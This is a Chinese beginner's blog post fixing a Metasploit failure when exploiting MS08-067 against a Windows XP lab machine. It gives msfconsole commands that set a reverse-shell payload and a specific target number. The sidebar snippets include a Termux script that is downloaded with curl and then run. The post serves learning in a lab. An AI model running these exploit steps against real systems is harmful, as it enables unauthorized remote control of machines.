关于使用Metasploit中出现Exploit completed, but no session was created的解决办法

最新推荐文章于 2024-08-06 14:42:16 发布
最新推荐文章于 2024-08-06 14:42:16 发布
阅读量3.8w 收藏 46
点赞数 21
文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430737/article/details/106746682
版权

最近准备学习有关渗透测试方面的内容,记录一些自己遇见的问题与解决方法,大佬勿喷。

我在做第一个实验:利用ms08-067入侵靶机,获取控制权时,就遇见了下面这个问题:

Exploit completed, but no session was created

Exploit completed, but no session was created我先把我的命令行加上:

msf5 > use /windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RhOSTS 192.168.0.106
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_reverse_tcp 
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.0.102
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

靶机系统为:Windows XP SP3 中文版

经过各方查阅,得出以下解决方法:

1.如果未设置targets,Metaexploit会使用默认的Exploit Target 0

   0   Automatic Targeting

此时要根据靶机版本选择合适的targets,例如这里是靶机系统为:Windows XP SP3 中文版,则只需加一行如下命令

msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34

targets 34

然后输入exploit进行攻击即可

2.把靶机换成Windows XP英文版

结果:
已控制

鄙人刚刚学渗透,才疏学浅。有什么问题,或者我说的有什么错误大家可以在评论区指出。

iJIAHUI
关注
  • 21
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 21
    评论
exploit已完成,但没有创建会话exploit completed, but no session was created
08-22 1万+
The "no session was created" message occurs if one of the following happens: 1) The exploit you use doesn't work against the target you selected. Could be the exploit is for a different ve...
使用metasploit利用vsftpd-2.3.4的backdoor进行exploit出现exploit completed but no session was created的解决办法
xixitaoguliuxian的博客
07-25 1万+
我在使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时,总是出现exploit completed but no session was created的问题,针对这个现象,我找出了几点可能会导致这个问题出现的原因。 1、被攻击机器的防火墙打开了。 2、下载的vsftpd_2.3.4的默认配置有问题:          a)如果exploit时显示T...
MSF漏洞利用完成但无法创建会话的几种原因
热门推荐
慢就是快
12-02 3万+
文章目录1.引言2.原因2.1漏洞payload和目标架构不匹配2.1.1 解决办法2.2 参数LHOST/SRVHOST 配置不当2.2.1 解决办法2.3 使用了NAT模式2.3.1 解决办法2.4存在杀软/EDR终端管理等2.4.1 解决办法2.5漏洞利用模块存在问题2.5.1 解决办法2.6目标已经修复漏洞打了补丁2.6.1 解决办法2.7 防火墙限制2.7.1 解决办法 1.引言 在实际攻防经常用到一些漏洞模块去测试目标是否存在对应漏洞,比如下列模块: exploit/windows/smb/p
【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击)
05-22 3740
【渗透工具】MSFconsole进阶:exploits(渗透攻击模块)
exploit completed, but no session was created
gRpc的博客
08-24 3741
metasploit
ms08-067漏洞的复现及所遇到的问题分析
ianTok
10-12 4755
ms08-067
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
"pitchw9a"可能指的是一个特定的漏洞或exploit模块,它可能是Metasploit框架的一个重要组成部分,用于针对特定目标进行渗透测试。在安全领域,了解并掌握如何使用Metasploit对于提升网络防御能力至关重要。 渗透...
metasploit使用lnk漏洞渗透测试.doc
03-18
Metasploit 使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
metasploit使用详解.pdf
08-14
### Metasploit使用详解 #### 一、Metasploit简介 Metasploit是一款非常知名的开源安全漏洞检测工具。作为一款免费工具,Metasploit被广泛应用于网络安全领域,特别是用于评估系统安全性的强度。该框架自2003...
Mastering-Metasploit:掌握MetasploitMetasploit模块
05-17
此存储库包含《掌握Metasploit手册》涵盖的模块: #要将所有模块自动加载到metasploit: ./msfrun.sh #手动方法#加载所有核心metasploit模块(开发,辅助,发布): msf>加载路径/ root / Desktop / ...
Metasploit-The Exploit Learning Tree
10-18
Metasploit-The Exploit Learning Tree 20171018下载,本来想免费共享,结果系统设定最小值2个资源分
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2647
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
Metasploit 魔鬼训练营》05 网络服务渗透攻击
kevinhanser
11-07 4363
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. 内存攻防技术 2. MS08-067 攻击案例 3. Oricle 数据库 4. KingView 6.53 HistorySrv 渗透攻击 5. Samba 安全漏洞
doublepulsar msf 执行报错解决
大哥一声吼
12-03 8745
doublepulsar msf 执行报错解决 在检查服务器是否存在漏洞的过程,发现exploit 报错, 报错信息如下,已经很明显了 Disable the DefangedMode option if you have authorization to proceed. ,没有正确设置好参数 msf5 exploit(windows/smb/doublepulsar_rce) &g...
metasploit介绍及使用
weixin_43873557的博客
02-07 2万+
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 目录 kali-metasploit框架目录路径: /opt/metasploit-framework/embedded/framework/ /usr/share
metasploit魔鬼训练营第一天笔记
f1gure的博客
12-10 799
实践题第一题 时间线:* May 7, 2007: Initial defect disclosure to the security (at) samba (dot) org [email concealed] email alias. * May 7, 2007: Initial developer response by Samba developer Gerald Carter
HTB Lame[Hack The Box HTB靶场]writeup系列1
重新启程
02-01 2866
首先祈祷一下SARS病情尽快过去,武汉加油!湖北加油! 为了不给国家添乱,所以我在HTB订阅了VIP,准备搞下Retired Machines的靶机。 目录 0x00 靶场介绍 0x01 扫描端口 0x02 ftp服务 0x03 smb服务 0x00 靶场介绍 我们从第一个lame开始。 如何注册账号,购买vip,网上有大把文章,这里我就不再记录了。 这个系列主要是...
域名安全详解
最新发布
TechEnthusiast的博客
08-06 164
域名安全是网络安全的重要组成部分,涉及多个方面。
termux使用metasploit
04-27
要在Termux使用Metasploit,您需要遵循以下步骤: 1. 打开Termux并更新软件包: ``` pkg update && pkg upgrade ``` 2. 安装必要的依赖项: ``` pkg install curl wget git tar openssl-tool ncurses-utils -y ``` 3. 安装Metasploit: ``` curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh chmod +x metasploit.sh ./metasploit.sh ``` 4. 启动Metasploit: ``` msfconsole ``` 现在,您可以开始使用Metasploit来执行渗透测试操作。注意,这是一项高级任务,需要一定的技术知识和专业技能。务必小心使用,不要用于非法用途。
评论 21
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值